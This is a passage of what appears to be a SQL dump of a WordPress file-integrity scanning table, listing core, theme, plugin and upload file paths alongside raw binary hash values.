��I:\0\n���a�[�\"�','',0,'?'),('����C�L�����D,','wp-content/uploads/2016/11/roof-plate-150x99.jpg',0,'4d\n9\"8I�p%�氀','4d\n9\"8I�p%�氀','GA�t�G����0�I�\\IgK�]�O&\0�i','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�-���.�ݼe���>','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('����Ё�z9`Iߋ�','wp-content/uploads/2019/08/young.jpg',0,'��U@��7�}\ZZ姑�+','��U@��7�}\ZZ姑�+','�l�~A,�L2O�4��kȉ�Cc�Cq�','',0,'?'),('��S%�ќ\"��r�!�','wp-includes/blocks/list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���g��\\a�7`&','O#��D$^���m�ӕ��9���y�H�j','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�zZ�,�)��+��','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('��N�2�\\�=`���','wp-content/uploads/2016/11/lost-places-150x150.jpg',0,'*�%�6�<�[D�\n=vx','*�%�6�<�[D�\n=vx','24DL3��0g��ޗ�c\0�PW1_�t��wΨj�{a','',0,'?'),('������gUMZ!��','wp-content/plugins/wordpress-seo/languages/wordpress-seo-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$���`�\\Pa\\�','b.N�o�%�|C���.X�|���蠇KZ�!','',0,'?'),('���3�qc;*�V\08�\\','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӌؠ����v&��Ad','K��s;���o���ZÏ�Y�S���!e������','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�C���/�Q�V@V�\0','wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ki�6���� c7�:','�<���A����}{|qj�\n�fq\04}��[�|\\cl','',0,'?'),('�$��b ���o�&��8�','wp-includes/blocks/button/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B~S�`��+�� �','�X알\r��a l�g>(4����(�*�','',0,'?'),('�3\'�E�����Z]�','wp-content/themes/vega/assets/img/bg_slide.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ka����\\�\r���','�p:</���\Z>���{Rgi��\Z6��','',0,'?'),('�9��s\\�p�X�)H','wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Sc��P7s���u.�','����i���`0�GHj .1�R��Y�Bc=n','',0,'?'),('�CV��%�����i','wp-includes/block-supports/border.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g*P�(�ǴMk��','�vF`��nb\0E��>Ơ3��~\0$-����v','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s� ��.:l���','',0,'?'),('�V�Ԉ7KTF�*�\r','wp-content/languages/en_GB-1c4303f02ff93b290e9faad991eeb06f.json',0,'��c�r�+���X','��c�r�+���X','\'���+�.�M���J��y���k+��U�8�V','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|+T��GTt��\0','�r�B~�<W5�9���[;]�ޓ5S��D���','',0,'?'),('��msœ13�oW6`�','wp-content/plugins/redirection/models/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�$��<��ZaY7���','� �~��a=���\"`�3�XԠ���Bɖ���','',0,'?'),('����ZK�*%���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlFactoryInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S���d1�A�\\�','�\\��Z~�\')צS9�V#&�{�k;����]���','',0,'?'),('���S���{|�\"uZz�','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�/�� ��j�t��J�','w;*�Ҙ�\rp�<L$�\r��\r��H\Z���','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�\Z����:�`','O~�>�[D�*b���5v�m�dyA\Zi_��lB��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h����Ŕ��c�}m�','������˗pZ�C��Eb�竔�.�u�','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��V��&��<�','\n�\r�Ɉ��,L�깁��\Z��V�zw9C��','',0,'?'),('��\r�\n��#-&���','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����WX�)�LXM�X�','�!!�2_��穭�M��z�]3���ߪ6�~��','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{4m���','�~2�;�S d��ss9@:U=��t���&$�n\0,�','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�)��X�,m�j��T','wp-includes/blocks/post-content/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Np�E�� ;�J{��','��B�@\\H�N8�P��ߣ�D��.���','',0,'?'),('�7�0���,� M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�;�*\04�S�;#B��w�','wp-content/plugins/wordpress-seo/lib/orm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͆d�i���W��u�','\"I� �,�2-X��0*Fe�Y�쮴?-w�a$�','',0,'?'),('�C�,ڦ�R1A� X�','wp-includes/blocks/latest-posts/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�D���y^:�)s�u�','���~7�]�B;s{kc��z����ZrV��|','',0,'?'),('�E�H���!���h�<y','wp-includes/blocks/site-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','} ����k_[3�?_�Fx�a������','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+�� ��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('�{Ӯ3��Hg�LK','wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J%U�d��ʎr`7','�Y\'O�m���ښ� ]A�}$��\\<����\0��5�','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�����A��d3w\\&','�\0\r���dli3�m.��~u����7= ���l','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT��� ��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('��k����\0I�Q�NP?@','wp-content/plugins/wordpress-seo/js/dist/externals/configurationWizard-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���q��\'97����','�h���dT���7���Z��$ʷ�\0�ȃlX�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���n���fTq�x','�pܞ�H�|�W���kס�|ZO<.�~`r^�}pL','',0,'?'),('���-�a���KP�a','wp-content/languages/plugins/wordpress-seo-en_GB-89cc355ce55e2f44acdba4277d2f408d.json',0,'���ϵ��Fy��dw','���ϵ��Fy��dw','px�כݐ�t�2g����\Z�nş�','',0,'?'),('��O$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�)�f��.�T�','3�/x\"��W���h@���fP\0]������','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%YO�<c���y�z','��U�\r3f0�¦w����y�v��POW�{�!','',0,'?'),('�\0��߯NI���','wp-content/themes/twentynineteen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}\0�9�\Z������=','3!\Z�=$d�x;$�\r���E�g����T�{\r','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����w�w���Ok','�bql�Vpph��)�S2\r�����Y~���','',0,'?'),('�\rq��O����D�zs','wp-includes/pomo/pomo/translations.php',0,'��C���*\Z�\'��','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('�� �6��!\"�P ','wp-content/themes/twentytwentyone/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�Q1n3�̽�C�\Z','�.�!���)��_.㤼�]\\�6D]���0�H','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('��������?|�1�e','wp-content/languages/plugins/wordpress-seo-en_GB-b040d7aa3bbb7f4a04cdc9104e526092.json',0,'�����g�ئ���','�����g�ئ���','�Q,��Z*Z-n�eR�r��gߊT�劉c�y*','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZZ���o���T','�^ƕ�/���&���){\'��:&[[�B�Q5�N�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8@\r�k��9�Ϫ�R5X','����J��f�w�m-�M�.�(�3�@�!��','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�Nsf�#�@Q;�;�{̻','wp-includes/blocks/query-pagination-numbers/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��de���:�!$��','y\"�Ϛ����z~IH�)�0�B�c�C��W��X','',0,'?'),('�c��O��-��+oe','wp-includes/blocks/block/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�Z�q�3)���','0&#��b�93LC\0����vX��<cɘ�TX','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:��lͨG��','',0,'?'),('�n�@G�n/��\0a<i','wp-content/plugins/wordpress-seo/admin/menu/class-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\Z��Ƀߎ:�����','�[l\n��W�q�:�6���.�<��Ї','',0,'?'),('�x���D��hd{jdpx','wp-content/plugins/redirection/locale/redirection-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\Z��ڌE�3d�>!','���n�\Z_�/��.�wܻ���f�j�hcN}','',0,'?'),('��o~�gE�_�5T\"`','wp-content/themes/vega/parts/footer-back-to-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L��,�C���','뭹�ϼz9-�}�����3�Iuf��~\ZX!�','',0,'?'),('���|j4��8K�H,�','wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ����~�@�.�','赎�A��$���G�6��ox\'yHx`�����','',0,'?'),('���v�*~����ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��8I/CM��x��','��W}u�}��v��m��7=E�K�Y4','',0,'?'),('��RKQ�5v�-�� ��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X1^11j�j�^','�S\ZX�}��\nM�S�\Z��d��5Hr�dߖ�','',0,'?'),('��q��뻣D(���j��','wp-includes/blocks/list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���g��\\a�7`&','O#��D$^���m�ӕ��9���y�H�j','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���CN<+�<t�','1��u �e)�β?��L���U2�7A)��Z�','',0,'?'),('�憓����w��\n�[�','wp-content/plugins/wordpress-seo/css/dist/select2/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�AO���K��o�t�','�������lN_-�\n��|\r蒝vy�$k','',0,'?'),('��abB>[,E�q���','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%g6icǤe\'HV[&�','p�lt�����8���G�4��f~�@m�','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'� ','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('�Z�{g�}�f�-��0\n','wp-content/plugins/wordpress-seo/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�`XKS\\�h�%5~','%��#����\'Ǐ��bc(�b�@f���?fY�','',0,'?'),('��Z{_��3�X\0R','wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��\n��v��8�0%','ٝE��yM�7gry�YWe�QZ`9Kݭ���','',0,'?'),('�!�+��U�U��\n&','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`P��PX�!�1)','.���5\0m��x\Z� ��x������Y�','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hᶴ���l�a�lc�','�7h[X}�����܆)L�=���o�����','',0,'?'),('�F�Ne��D aŢ�e�','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-300x200.jpg',0,'ZK��s�[��#J ��T','ZK��s�[��#J ��T','k�a����}G�F��q�>�$d+��q\"��','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w%Z�*�H���','�~����c�yh�G�K��S��huP�����m�(','',0,'?'),('�pu�/�e�<\n2�M�','wp-content/uploads/2016/11/White-Modern-Kitchen-1024x604.jpg',0,'��Lo_9�F��6i��','��Lo_9�F��6i��','�0��$��L/�͜�i:�Г��y���r晴','',0,'?'),('��\\A��PH�<�l9','wp-content/themes/vega/customize/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�G�}����-)�ۢU','Y%@ڡ�j�@��s�m9[�v�?�@���oۡ��','',0,'?'),('��Ư \'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('����l����`b=���','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Qb�H�2�n�E��Q','�3ƕ?��k�&�#�̋��٘1���j�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Q7�5m1��','a�}���S{K�~�2��,��P�={����','',0,'?'),('�����G��4�Y���','wp-content/uploads/2019/12/pexels-photo-150x150.jpg',0,'�bl�`��n#I���z','�bl�`��n#I���z','�LJ�W�S��*�Nnk��w���\roFY�> �','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"?DС���H���','�{)�y\\���M�ԇ;��Hw���r���6','',0,'?'),('��-Z�b{)����6rH','wp-content/uploads/wpo-plugins-tables-list.json',0,'���O���vh�[q�','���O���vh�[q�','p��d%�M��\n�k\ZK�b@���Y��r�-w�','',0,'?'),('��6�<�R���JJ�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/HttpBasicAuthOptionProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#��ٍ���74','�S�P��\0T�\"�q��1�������ϸ\0\0�J','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('�SzʀU�\n����','wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�\Z؍�o��','��U�/�����yI����^�:?Rp$��Rs1��G','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n �\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��>���Z����G�','���\n��#Pw3Id��}͇%�J���j�U��+','',0,'?'),('�1�cUd���/R� ','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�6��?��XlqT:� ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/id.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QM9b�t�U2��','��r����L��!�3��K�1�V�{\r��`��A�/','',0,'?'),('�7�݆���㮪N�;�','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>z�o�s\\[�����\"','O�E�usnp�6*Fv]>�0�WyN ��Zd�B','',0,'?'),('�8��d\0̷#�-���o�','wp-content/languages/plugins/wordpress-seo-en_GB-81239295ab3cca83019934ad6f4ff017.json',0,'y״�5�^��v�','y״�5�^��v�','�5�G)�������?F�*�����iFm��g4�','',0,'?'),('�8}��:�K���_�','wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.l�{7��2�Րl','4�+��*/�S+��!b��䢈����d��7','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb� x\'P�:�����U','',0,'?'),('�J�:��`A�q����1','wp-content/themes/twentynineteen/images/pattern_04.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*����$[��;��R','#��(4�2L{���]����{˖e~1\'��0','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�ҩL�ȕ�<C��7 ','h1����ޛ�}�B�\Zf���F�Ұ�I�','',0,'?'),('�f�g-�6A�[�X�~�','wp-content/plugins/redirection/locale/json/redirection-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�7�����jW�','�� �!���pL�0�!���Yu��3���WW','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl�� ��u#KV���n','',0,'?'),('�y�g��zaU\"� XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�BU��4�X$ 6�i�','#�����0�4%�6ad�Z@!\",��6\r��','',0,'?'),('����&P8��F�{�\0','wp-content/plugins/disable-gutenberg/inc/classic-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{\'��w���_��j�','Y��Ҽ(�IsՕ��7�{��t�I�,�w(���','',0,'?'),('���X��k�\nX�l<{M�','wp-content/plugins/redirection/redirection-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','en@�l;��yi��','�u��|�]�6iYC}`6�#�<¡S�Q�F','',0,'?'),('���\0.T��I�9����','wp-content/plugins/wordpress-seo/src/config/migrations/20201216141134_ExpandPrimaryTermIDColumnLengths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��|�_��0\0���','Q�0ՠ���y��\"�I;\n/�j�?�6��^@�','',0,'?'),('��}�Ne���АA��@�','wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z=p(��V:sK�M','@��y�|�ˈ�&�Y_B�z~̎L7�Q','',0,'?'),('�����gFB�ZÚ(v','wp-content/themes/twentytwenty/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z\Z�1�.�w�L��՜�','A�)��_��bK�Azg&��k:�pٕ���`','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('��: ����d�*�]�j','wp-content/plugins/wordpress-seo/languages/yoast-components-lt_LT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�.J��q1��Ư���',':��9�1�ө�$7N�,�P쇐�z`�Ǝ�\Z','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�鿾>T9��*�L�','��/�=ٜ�����}j��.9��lg�','',0,'?'),('���m�\r��Jaҽ��','wp-content/plugins/wordpress-seo/languages/yoast-components-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_� �f\r-|��b��','y5��\Z\0#w��lN��F����l��aq','',0,'?'),('�o�/�d�4x`��','wp-content/plugins/akismet/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^v�2U2���z��y�','�Qd0sƉx��(�;=�&�־j{^l;�','',0,'?'),('�9\r����\rK|�\r�2','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/GenericProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��#�9�j�h�\'','.��펢KN�� �@�;&��=�-\n�W8��','',0,'?'),('�+Fc�0m_����Ii','wp-content/themes/twentytwentyone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\nq3Ԙ>�}6Y�','Ĭ{z�K��E[�j8��؈��Oݩ��r���5d�','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�\\6v48.��m»�.','wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)c��\'K�դ4�`l��','K{�Fߠ���h��Ŝ}�g�u\r�&�+X��','',0,'?'),('�a�p�z�K\n<���9','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-150x150.jpg',0,'2u1��q�E�xD�','2u1��q�E�xD�','���];ԭA�Z��\Z�\n�Y4>q��1v0�g���','',0,'?'),('�bm���q�[pB%�2]','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-mailchimp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؒ��$Μ�&��MX�tI','C�(R-\n@�r\"Cq�@�%!�U��As��','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��@-�:��볙�\0\nm','wp-content/uploads/2019/08/health2-768x512.jpg',0,'N�o({,BArٷ�q�_','N�o({,BArٷ�q�_','<�VdL��Yͣ��(X�Du�G�)�UWc���ta','',0,'?'),('��iz���i)��7+O','wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e8���=�.�%̝�','OM��S{�Z�N��C��Q�l\\�*����','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.